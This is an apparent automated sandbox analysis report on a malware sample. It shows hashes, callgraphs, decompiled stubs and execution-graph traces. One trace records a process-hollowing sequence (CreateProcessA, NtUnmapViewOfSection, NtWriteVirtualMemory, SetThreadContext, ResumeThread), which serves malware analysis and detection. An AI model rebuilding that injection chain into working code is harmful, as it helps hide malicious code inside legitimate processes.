                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit__getptd_noexit
                    • String ID: csm
                    • API String ID: 803148776-1018135373
                    • Opcode ID: f7bd628e02896e3b0ee480ada6aed6003973c84ee745a5278aa14c7bcef4c16f
                    • Instruction ID: 60db7ef5a43f9f1ae265a39f2d0fbc4b15c7f667e9ba76e2138882fac8c69323
                    • Opcode Fuzzy Hash: f7bd628e02896e3b0ee480ada6aed6003973c84ee745a5278aa14c7bcef4c16f
                    • Instruction Fuzzy Hash: 5D017835800A068ADF24AF21C444AAFB7B6EF04325F24843FE051766D1DB3C8991CF29
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:6.1%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:63.2%
                    Total number of Nodes:19
                    Total number of Limit Nodes:0
                    execution_graph 668 402ad1 669 402ad2 668->669 671 402b56 669->671 672 40180c 669->672 673 40181b 672->673 674 40183e Sleep 673->674 676 401859 674->676 675 40186a NtTerminateProcess 677 401876 675->677 676->675 677->671 682 401818 683 40181b 682->683 684 40183e Sleep 683->684 686 401859 684->686 685 40186a NtTerminateProcess 687 401876 685->687 686->685 688 402a9d 689 402ad2 688->689 690 40180c 2 API calls 689->690 691 402b56 689->691 690->691

                    Callgraph

                    • Executed
                    • Not Executed
                    • Opacity -> Relevance
                    • Disassembly available
                    callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                    Control-flow Graph

                    C-Code - Quality: 23%
                    			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                    				char _v8;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t11;
                    				void* _t16;
                    				intOrPtr* _t17;
                    				void* _t19;
                    				void* _t20;
                    				void* _t21;
                    
                    				_t22 = __eflags;
                    				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                    				_t17 = _a4;
                    				Sleep(0x1388);
                    				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                    				if(_t11 != 0) {
                    					_push(_a16);
                    					_push(_v8);
                    					_push(_t11);
                    					_push(_t17); // executed
                    					L00401455(0x60, _t19, _t20); // executed
                    				}
                    				 *_t17(0xffffffff, 0); // executed
                    				_t17 = _t17 + 0x60;
                    				_push(0x60);
                    				asm("pushad");
                    				__ecx =  *__esp;
                    				__esp = __esp + 4;
                    				return __eax;
                    			}














                    0x0040180c
                    0x00401839
                    0x0040183e
                    0x00401846
                    0x00401854
                    0x0040185b
                    0x0040185d
                    0x00401860
                    0x00401863
                    0x00401864
                    0x00401865
                    0x00401865
                    0x0040186e
                    0x0040187a
                    0x0040188a
                    0x0040188b
                    0x0040188c
                    0x0040188f
                    0x004018a2

                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401846
                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                    Memory Dump Source
                    • Source File: 00000001.00000002.386442101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: ProcessSleepTerminate
                    • String ID:
                    • API String ID: 417527130-0
                    • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                    • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                    • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                    • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401846
                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                    Memory Dump Source
                    • Source File: 00000001.00000002.386442101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: ProcessSleepTerminate
                    • String ID:
                    • API String ID: 417527130-0
                    • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                    • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                    • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                    • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 17%
                    			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                    				void* _t11;
                    				intOrPtr* _t17;
                    				void* _t19;
                    				void* _t22;
                    
                    				_t23 = __eflags;
                    				asm("out 0x95, eax");
                    				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                    				_t17 =  *((intOrPtr*)(_t22 + 8));
                    				Sleep(0x1388);
                    				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                    				if(_t11 != 0) {
                    					_push( *((intOrPtr*)(_t22 + 0x14)));
                    					_push( *((intOrPtr*)(_t22 - 4)));
                    					_push(_t11);
                    					_push(_t17); // executed
                    					L00401455(0x60, _t19, __edi); // executed
                    				}
                    				 *_t17(0xffffffff, 0); // executed
                    				_t17 = _t17 + 0x60;
                    				_push(0x60);
                    				asm("pushad");
                    				__ecx =  *__esp;
                    				__esp = __esp + 4;
                    				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                    				_pop(__edi);
                    				_pop(__esi);
                    				_pop(__ebx);
                    				__esp = __ebp;
                    				_pop(__ebp);
                    				return __eax;
                    			}







                    0x00401822
                    0x00401822
                    0x00401839
                    0x0040183e
                    0x00401846
                    0x00401854
                    0x0040185b
                    0x0040185d
                    0x00401860
                    0x00401863
                    0x00401864
                    0x00401865
                    0x00401865
                    0x0040186e
                    0x0040187a
                    0x0040188a
                    0x0040188b
                    0x0040188c
                    0x0040188f
                    0x00401899
                    0x0040189e
                    0x0040189f
                    0x004018a0
                    0x004018a1
                    0x004018a1
                    0x004018a2

                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401846
                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                    Memory Dump Source
                    • Source File: 00000001.00000002.386442101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: ProcessSleepTerminate
                    • String ID:
                    • API String ID: 417527130-0
                    • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                    • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                    • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                    • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 17%
                    			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                    				void* _t8;
                    				void* _t11;
                    				intOrPtr* _t17;
                    				void* _t19;
                    				void* _t22;
                    
                    				_t23 = __eflags;
                    				asm("sbb ebx, ebp");
                    				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                    				_t17 =  *((intOrPtr*)(_t22 + 8));
                    				Sleep(0x1388);
                    				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                    				if(_t11 != 0) {
                    					_push( *((intOrPtr*)(_t22 + 0x14)));
                    					_push( *((intOrPtr*)(_t22 - 4)));
                    					_push(_t11);
                    					_push(_t17); // executed
                    					L00401455(0x60, _t19, __edi); // executed
                    				}
                    				 *_t17(0xffffffff, 0); // executed
                    				_t17 = _t17 + 0x60;
                    				_push(0x60);
                    				asm("pushad");
                    				__ecx =  *__esp;
                    				__esp = __esp + 4;
                    				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                    				_pop(__edi);
                    				_pop(__esi);
                    				_pop(__ebx);
                    				__esp = __ebp;
                    				_pop(__ebp);
                    				return __eax;
                    			}








                    0x00401826
                    0x00401826
                    0x00401839
                    0x0040183e
                    0x00401846
                    0x00401854
                    0x0040185b
                    0x0040185d
                    0x00401860
                    0x00401863
                    0x00401864
                    0x00401865
                    0x00401865
                    0x0040186e
                    0x0040187a
                    0x0040188a
                    0x0040188b
                    0x0040188c
                    0x0040188f
                    0x00401899
                    0x0040189e
                    0x0040189f
                    0x004018a0
                    0x004018a1
                    0x004018a1
                    0x004018a2

                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401846
                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                    Memory Dump Source
                    • Source File: 00000001.00000002.386442101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: ProcessSleepTerminate
                    • String ID:
                    • API String ID: 417527130-0
                    • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                    • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                    • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                    • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 20%
                    			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                    				void* _t10;
                    				void* _t13;
                    				intOrPtr* _t19;
                    				void* _t22;
                    				void* _t25;
                    
                    				_t26 = __eflags;
                    				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                    				_t19 =  *((intOrPtr*)(_t25 + 8));
                    				Sleep(0x1388);
                    				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                    				if(_t13 != 0) {
                    					_push( *((intOrPtr*)(_t25 + 0x14)));
                    					_push( *((intOrPtr*)(_t25 - 4)));
                    					_push(_t13);
                    					_push(_t19); // executed
                    					L00401455(0x60, _t22, __edi); // executed
                    				}
                    				 *_t19(0xffffffff, 0); // executed
                    				_t19 = _t19 + 0x60;
                    				_push(0x60);
                    				asm("pushad");
                    				__ecx =  *__esp;
                    				__esp = __esp + 4;
                    				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                    				_pop(__edi);
                    				_pop(__esi);
                    				_pop(__ebx);
                    				__esp = __ebp;
                    				_pop(__ebp);
                    				return __eax;
                    			}








                    0x00401834
                    0x00401839
                    0x0040183e
                    0x00401846
                    0x00401854
                    0x0040185b
                    0x0040185d
                    0x00401860
                    0x00401863
                    0x00401864
                    0x00401865
                    0x00401865
                    0x0040186e
                    0x0040187a
                    0x0040188a
                    0x0040188b
                    0x0040188c
                    0x0040188f
                    0x00401899
                    0x0040189e
                    0x0040189f
                    0x004018a0
                    0x004018a1
                    0x004018a1
                    0x004018a2

                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401846
                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                    Memory Dump Source
                    • Source File: 00000001.00000002.386442101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: ProcessSleepTerminate
                    • String ID:
                    • API String ID: 417527130-0
                    • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                    • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                    • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                    • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:12.8%
                    Dynamic/Decrypted Code Coverage:28.3%
                    Signature Coverage:0.7%
                    Total number of Nodes:1589
                    Total number of Limit Nodes:23
                    execution_graph 6718 406880 TlsAlloc 6415 405b03 6418 4042c7 6415->6418 6417 405b16 ctype 6419 4042d3 6418->6419 6420 4042db 6418->6420 6421 404e94 __setmbcp 65 API calls 6419->6421 6420->6417 6421->6420 6311 405d44 6312 40494f FindHandler 67 API calls 6311->6312 6313 405d4c 6312->6313 6719 409d84 RtlUnwind 6720 408d84 6721 408d96 6720->6721 6723 408da4 @_EH4_CallFilterFunc@8 6720->6723 6722 404c9b __setmbcp_nolock 5 API calls 6721->6722 6722->6723 4855 406805 4858 406793 TlsGetValue 4855->4858 4859 4067ab 4858->4859 4860 4067cc GetModuleHandleW 4858->4860 4859->4860 4861 4067b5 TlsGetValue 4859->4861 4862 4067e2 4860->4862 4863 4067dc 4860->4863 4865 4067c0 4861->4865 4866 4067c4 4862->4866 4867 4067ff 4862->4867 4869 4070cc 4863->4869 4865->4860 4865->4866 4866->4867 4868 4067f7 RtlEncodePointer 4866->4868 4868->4867 4870 4070d7 Sleep GetModuleHandleW 4869->4870 4871 4070f5 4870->4871 4872 4070f9 4870->4872 4871->4870 4871->4872 4872->4862 6422 40460a 6423 404c9b __setmbcp_nolock 5 API calls 6422->6423 6424 40461e 6423->6424 6427 4066ad 6424->6427 6428 406a5a __getptd 65 API calls 6427->6428 6429 4066ba 6428->6429 6430 406721 6429->6430 6431 4066fe 6429->6431 6434 404637 6429->6434 6430->6434 6445 406349 6430->6445 6431->6434 6435 405bd2 6431->6435 6436 405bde __setmbcp 6435->6436 6437 406a5a __getptd 65 API calls 6436->6437 6443 405bfe __CallSettingFrame@12 6437->6443 6438 405c73 6439 405c98 ___FrameUnwindToState 65 API calls 6438->6439 6441 405c7f 6439->6441 6440 40499b FindHandler 67 API calls 6440->6443 6442 405c89 __setmbcp 6441->6442 6444 40499b FindHandler 67 API calls 6441->6444 6442->6434 6443->6438 6443->6440 6444->6442 6446 406368 6445->6446 6447 40499b FindHandler 67 API calls 6446->6447 6449 406382 6446->6449 6447->6449 6448 406675 6451 406a5a __getptd 65 API calls 6448->6451 6455 406a5a __getptd 65 API calls 6449->6455 6475 40645d FindHandler type_info::operator== ___TypeMatch 6449->6475 6450 40665c 6524 406255 6450->6524 6454 40667d 6451->6454 6452 40494f FindHandler 67 API calls 6452->6475 6456 40668b 6454->6456 6458 40499b FindHandler 67 API calls 6454->6458 6457 4063c9 6455->6457 6456->6434 6457->6456 6460 406a5a __getptd 65 API calls 6457->6460 6458->6456 6462 4063db 6460->6462 6463 406a5a __getptd 65 API calls 6462->6463 6466 4063e9 FindHandler 6463->6466 6464 4044fb __CxxThrowException@8 RaiseException 6464->6475 6465 405d76 IsInExceptionSpec 67 API calls 6465->6475 6468 40499b FindHandler 67 API calls 6466->6468 6470 406405 6466->6470 6467 40642f 6469 406a5a __getptd 65 API calls 6467->6469 6468->6470 6471 406434 6469->6471 6470->6467 6474 40499b FindHandler 67 API calls 6470->6474 6471->6475 6476 406a5a __getptd 65 API calls 6471->6476 6473 406a5a 65 API calls __getptd 6473->6475 6474->6467 6475->6448 6475->6450 6475->6452 6475->6464 6475->6465 6475->6473 6482 405bd2 ___FrameUnwindToState 67 API calls 6475->6482 6490 405ada 6475->6490 6493 4047b3 6475->6493 6499 4061e7 6475->6499 6509 404580 RtlUnwind 6475->6509 6510 405df1 6475->6510 6477 406442 6476->6477 6478 406a5a __getptd 65 API calls 6477->6478 6479 40644d 6478->6479 6484 405d76 6479->6484 6482->6475 6485 405d82 6484->6485 6489 405d8c ___TypeMatch 6484->6489 6486 40499b FindHandler 67 API calls 6485->6486 6487 405d87 6486->6487 6488 40494f FindHandler 67 API calls 6487->6488 6488->6489 6489->6475 6491 4041fa std::exception::exception 65 API calls 6490->6491 6492 405aeb 6491->6492 6492->6475 6495 4047cc 6493->6495 6494 404802 6496 40481b 6494->6496 6497 40499b FindHandler 67 API calls 6494->6497 6495->6494 6498 40499b FindHandler 67 API calls 6495->6498 6496->6475 6497->6496 6498->6495 6500 4061f2 6499->6500 6501 4061ff 6499->6501 6540 406155 6500->6540 6544 404580 RtlUnwind 6501->6544 6504 406216 6505 405bd2 ___FrameUnwindToState 67 API calls 6504->6505 6506 406224 6505->6506 6545 405e3a 6506->6545 6508 406245 FindHandler 6508->6475 6509->6475 6511 405dfd __EH_prolog3_catch 6510->6511 6512 406a5a __getptd 65 API calls 6511->6512 6513 405e02 6512->6513 6514 405e10 6513->6514 6516 40499b FindHandler 67 API calls 6513->6516 6595 404988 6514->6595 6516->6514 6525 40626c 6524->6525 6537 406344 6524->6537 6526 406a5a __getptd 65 API calls 6525->6526 6527 406272 6526->6527 6528 406a5a __getptd 65 API calls 6527->6528 6538 4062af 6527->6538 6531 406280 6528->6531 6529 4062c8 6530 4047b3 _GetRangeOfTrysToCheck 67 API calls 6529->6530 6533 4062dd 6530->6533 6534 406805 FindHandlerForForeignException 6 API calls 6531->6534 6532 40499b FindHandler 67 API calls 6532->6529 6533->6537 6539 4061e7 FindHandler 68 API calls 6533->6539 6535 40628b 6534->6535 6535->6538 6598 40463d 6535->6598 6537->6448 6538->6529 6538->6532 6538->6537 6539->6533 6541 406161 __setmbcp 6540->6541 6559 405fd6 6541->6559 6543 406190 ___BuildCatchObject __setmbcp 6543->6501 6544->6504 6546 405e46 __setmbcp 6545->6546 6570 404828 6546->6570 6549 406a5a __getptd 65 API calls 6550 405e71 6549->6550 6551 406a5a __getptd 65 API calls 6550->6551 6552 405e7f 6551->6552 6553 406a5a __getptd 65 API calls 6552->6553 6554 405e8d 6553->6554 6555 406a5a __getptd 65 API calls 6554->6555 6556 405e98 _CallCatchBlock2 6555->6556 6575 405f60 6556->6575 6558 405f4c __setmbcp 6558->6508 6561 405fe2 __setmbcp 6559->6561 6560 40604f ___BuildCatchObject __setmbcp 6560->6543 6561->6560 6562 4060bf FindHandler 6561->6562 6564 406077 FindHandler 6561->6564 6565 406029 FindHandler 6561->6565 6562->6565 6567 4060dc ___BuildCatchObject 6562->6567 6563 40499b FindHandler 67 API calls 6563->6560 6564->6565 6566 406097 6564->6566 6565->6560 6565->6563 6568 405600 ___sbh_free_block __VEC_memcpy 6566->6568 6569 405600 ___sbh_free_block __VEC_memcpy 6567->6569 6568->6560 6569->6560 6571 406a5a __getptd 65 API calls 6570->6571 6572 40483b 6571->6572 6573 406a5a __getptd 65 API calls 6572->6573 6574 404849 6573->6574 6574->6549 6584 40487b 6575->6584 6578 406a5a __getptd 65 API calls 6579 405f74 6578->6579 6580 406a5a __getptd 65 API calls 6579->6580 6582 405f82 6580->6582 6581 405fc5 FindHandler 6581->6558 6582->6581 6592 404854 6582->6592 6585 406a5a __getptd 65 API calls 6584->6585 6586 404886 6585->6586 6587 404891 6586->6587 6588 4048a2 6586->6588 6589 406a5a __getptd 65 API calls 6587->6589 6590 406a5a __getptd 65 API calls 6588->6590 6591 404896 6589->6591 6590->6591 6591->6578 6593 406a5a __getptd 65 API calls 6592->6593 6594 40485e 6593->6594 6594->6581 6596 406a5a __getptd 65 API calls 6595->6596 6597 40498d 6596->6597 6599 404661 6598->6599 6601 40464f 6598->6601 6600 406a5a __getptd 65 API calls 6599->6600 6600->6601 6601->6538 6657 405eca 6660 405cb3 6657->6660 6659 405ed2 6661 405cf5 6660->6661 6662 405cbd 6660->6662 6661->6659 6662->6661 6663 406a5a __getptd 65 API calls 6662->6663 6664 405ce9 6663->6664 6664->6659 6665 405ed3 6666 406a5a __getptd 65 API calls 6665->6666 6668 405edb 6666->6668 6667 405bd2 ___FrameUnwindToState 67 API calls 6669 405f2b 6667->6669 6668->6667 6670 405f60 FindHandler 65 API calls 6669->6670 6671 405f4c __setmbcp 6670->6671 6320 405c54 6323 405b89 6320->6323 6324 405ba8 6323->6324 6325 405b9c 6323->6325 6326 406a5a __getptd 65 API calls 6324->6326 6327 405bc7 6325->6327 6329 406a5a __getptd 65 API calls 6325->6329 6328 405bb9 6326->6328 6328->6327 6330 406a5a __getptd 65 API calls 6328->6330 6329->6324 6330->6327 6602 404714 6603 404c9b __setmbcp_nolock 5 API calls 6602->6603 6604 40472a 6603->6604 6605 4066ad ___InternalCxxFrameHandler 69 API calls 6604->6605 6610 404735 6604->6610 6606 40476d 6605->6606 6607 404784 6606->6607 6611 404580 RtlUnwind 6606->6611 6609 40463d _CallSETranslator 65 API calls 6607->6609 6609->6610 6611->6607 6672 4045d4 6673 4066ad ___InternalCxxFrameHandler 69 API calls 6672->6673 6674 4045fa 6673->6674 6675 403cd6 6676 403cdf std::bad_exception::bad_exception 6675->6676 6677 403cfa 6676->6677 6680 403b24 std::_String_base::_Xlen 65 API calls 6676->6680 6678 403b71 std::_String_base::_Xlen 65 API calls 6677->6678 6679 403d05 std::_String_base::_Xlen 6678->6679 6680->6677 6612 40431b 6615 40430b 6612->6615 6614 404328 ctype 6618 404f22 6615->6618 6617 404319 6617->6614 6619 404f2e __setmbcp 6618->6619 6620 4081fa __lock 65 API calls 6619->6620 6621 404f35 6620->6621 6624 404f6e 6621->6624 6626 404e94 __setmbcp 65 API calls 6621->6626 6627 404f65 6621->6627 6623 404e94 __setmbcp 65 API calls 6623->6624 6628 404f89 6624->6628 6625 404f7f __setmbcp 6625->6617 6626->6627 6627->6623 6631 408120 LeaveCriticalSection 6628->6631 6630 404f90 6630->6625 6631->6630 6331 405c5e 6333 405c09 __CallSettingFrame@12 6331->6333 6332 405c73 6345 405c98 6332->6345 6333->6332 6339 40499b 6333->6339 6337 405c89 __setmbcp 6338 40499b FindHandler 67 API calls 6338->6337 6340 4049a7 __setmbcp 6339->6340 6341 40680e __decode_pointer 5 API calls 6340->6341 6342 4049b2 6341->6342 6343 40494f FindHandler 67 API calls 6342->6343 6344 4049d2 6343->6344 6346 406a5a __getptd 65 API calls 6345->6346 6347 405c9d 6346->6347 6348 405c7f 6347->6348 6349 406a5a __getptd 65 API calls 6347->6349 6348->6337 6348->6338 6349->6348 6632 405a1f 6633 4091a3 __calloc_crt 65 API calls 6632->6633 6634 405a2b 6633->6634 6635 406793 __encode_pointer 6 API calls 6634->6635 6636 405a33 6635->6636 4821 610000 4824 610630 4821->4824 4823 610005 4825 61064c 4824->4825 4827 611577 4825->4827 4830 6105b0 4827->4830 4833 6105dc 4830->4833 4831 6105e2 GetFileAttributesA 4831->4833 4832 61061e 4833->4831 4833->4832 4835 610420 4833->4835 4836 6104f3 4835->4836 4837 6104fa 4836->4837 4838 6104ff CreateWindowExA 4836->4838 4837->4833 4838->4837 4839 610540 PostMessageA 4838->4839 4840 61055f 4839->4840 4840->4837 4842 610110 VirtualAlloc GetModuleFileNameA 4840->4842 4843 610414 4842->4843 4844 61017d CreateProcessA 4842->4844 4843->4840 4844->4843 4846 61025f VirtualFree VirtualAlloc GetThreadContext 4844->4846 4846->4843 4847 6102a9 ReadProcessMemory 4846->4847 4848 6102e5 VirtualAllocEx NtWriteVirtualMemory 4847->4848 4849 6102d5 NtUnmapViewOfSection 4847->4849 4850 61033b 4848->4850 4849->4848 4851 610350 NtWriteVirtualMemory 4850->4851 4852 61039d WriteProcessMemory SetThreadContext ResumeThread 4850->4852 4851->4850 4853 6103fb ExitProcess 4852->4853 6730 40a2a3 6731 40a2af SetLastError 6730->6731 6732 40a2b7 __setmbcp 6730->6732 6731->6732 6637 403d26 6638 403b71 std::_String_base::_Xlen 65 API calls 6637->6638 6639 403d33 6638->6639 6640 4044fb __CxxThrowException@8 RaiseException 6639->6640 6641 403d3a 6640->6641 6350 402f67 6353 402f5c 6350->6353 6352 402f72 ctype 6354 4042c7 6353->6354 6355 4042db 6354->6355 6356 404e94 __setmbcp 65 API calls 6354->6356 6355->6352 6356->6355 6743 4033a9 6744 4033ab LoadLibraryA 6743->6744 6745 40348d VirtualProtect 6744->6745 6360 40ba6c 6361 404c9b __setmbcp_nolock 5 API calls 6360->6361 6362 40ba7d 6361->6362 6687 406ef0 6688 406f29 6687->6688 6689 406f1c 6687->6689 6691 404c9b __setmbcp_nolock 5 API calls 6688->6691 6690 404c9b __setmbcp_nolock 5 API calls 6689->6690 6690->6688 6692 406f39 __except_handler4 __IsNonwritableInCurrentImage 6691->6692 6693 406fbc 6692->6693 6694 406f92 __except_handler4 6692->6694 6703 408e16 RtlUnwind 6692->6703 6694->6693 6695 406fac 6694->6695 6696 404c9b __setmbcp_nolock 5 API calls 6694->6696 6697 404c9b __setmbcp_nolock 5 API calls 6695->6697 6696->6695 6697->6693 6699 40700b __except_handler4 6700 40703f 6699->6700 6701 404c9b __setmbcp_nolock 5 API calls 6699->6701 6702 404c9b __setmbcp_nolock 5 API calls 6700->6702 6701->6700 6702->6694 6703->6699 6363 404973 6364 404976 6363->6364 6365 406d7c _abort 67 API calls 6364->6365 6366 404982 __setmbcp 6365->6366 6704 403df3 6705 403dcd moneypunct 65 API calls 6704->6705 6706 403dfe ctype 6705->6706 6367 406a74 6369 406a80 __setmbcp 6367->6369 6368 406b82 __setmbcp 6369->6368 6370 406a98 6369->6370 6372 404e94 __setmbcp 65 API calls 6369->6372 6371 406aa6 6370->6371 6373 404e94 __setmbcp 65 API calls 6370->6373 6374 406ab4 6371->6374 6375 404e94 __setmbcp 65 API calls 6371->6375 6372->6370 6373->6371 6376 406ac2 6374->6376 6377 404e94 __setmbcp 65 API calls 6374->6377 6375->6374 6378 406ad0 6376->6378 6380 404e94 __setmbcp 65 API calls 6376->6380 6377->6376 6379 406ade 6378->6379 6381 404e94 __setmbcp 65 API calls 6378->6381 6382 406aec 6379->6382 6383 404e94 __setmbcp 65 API calls 6379->6383 6380->6378 6381->6379 6384 406afd 6382->6384 6385 404e94 __setmbcp 65 API calls 6382->6385 6383->6382 6386 4081fa __lock 65 API calls 6384->6386 6385->6384 6387 406b05 6386->6387 6388 406b11 InterlockedDecrement 6387->6388 6389 406b2a 6387->6389 6388->6389 6390 406b1c 6388->6390 6403 406b8e 6389->6403 6390->6389 6393 404e94 __setmbcp 65 API calls 6390->6393 6393->6389 6394 4081fa __lock 65 API calls 6395 406b3e 6394->6395 6396 406b6f 6395->6396 6398 4094ca ___removelocaleref 8 API calls 6395->6398 6406 406b9a 6396->6406 6401 406b53 6398->6401 6400 404e94 __setmbcp 65 API calls 6400->6368 6401->6396 6402 4092f2 ___freetlocinfo 65 API calls 6401->6402 6402->6396 6409 408120 